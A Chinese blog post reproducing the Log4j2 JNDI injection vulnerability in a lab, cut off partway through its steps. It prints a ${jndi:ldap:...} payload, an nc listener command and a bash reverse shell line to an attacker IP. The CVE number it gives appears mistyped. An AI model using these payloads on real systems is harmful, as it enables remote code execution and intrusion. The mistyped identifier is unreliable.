log4j2漏洞复现

本文详细描述了Log4j2中的JNDI注入漏洞CVE-2021-4422,涉及LDAP和RMI服务,可导致远程代码执行(RCE)。复现步骤包括DNS验证、payload构建和利用工具的使用。文章还提供了修复建议,如过滤特定字符、限制外部访问和调整jndi配置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近一直在搞蓝队所以懈怠了更新,主要还是懒得搬笔记

CVE-2021-4422

漏洞原理:log4j2组件在处理程序日志记录时存在JNDI注入缺陷
详解:
在该框架下的lookup查询服务提供了{}字段解析,故payload为${jndi:ldap:恶意url},JNDI会去对对应的服务(如:LDAP、DNS等)查找资源,本例调用LDAP服务,<font color="#f79646">由于对lookup的出栈无限制</font>,导致最终指向攻击者站点,下载远程恶意class文件,最终导致远程rce。
漏洞价值:任意RCE
漏洞利用:LDAP(目录访问协议),RMI(分布式对象应用)

PS:JNDI(java命名和目录接口)用于目录管理,通过名称调用接口

漏洞复现

靶机:192.168.245.1xx
攻击机:192.168.245.1oo

1.DNSlog验证漏洞

payload=\${jndi:ldap\://\${sys:java.version}.DNS地址}

2.攻击机监听端口 7777

nc -lvvp 7777

3.将bash反弹shell命令编码 base64

<font color="#f79646">bash -i >& /dev/tcp/192.168.245.1oo/7777 0>&1</font>
解释:
- bash:启动bash shell
- -i:开启

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值